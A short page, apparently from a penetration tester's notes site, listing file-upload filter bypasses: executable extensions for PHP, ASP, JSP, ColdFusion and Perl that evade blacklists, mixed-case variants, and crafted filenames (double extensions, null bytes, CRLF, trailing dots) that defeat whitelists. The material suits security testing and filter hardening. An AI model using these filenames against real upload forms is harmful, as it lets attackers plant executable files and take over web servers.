File Upload Bypass

File Upload Bypass -

Blacklisting Bypass

  1. PHP β†’ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

  2. ASP β†’ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

  3. Jsp β†’ .jsp, .jspx, .jsw, .jsv, .jspf

  4. Coldfusion β†’ .cfm, .cfml, .cfc, .dbm

  5. Perl β†’ .pl, .cgi

Using random capitalization β†’ .pHp, .pHP5, .PhAr

Whitelisting Bypass

file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php. file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg

PreviousMITM proxyNextTo remember LoG

Last updated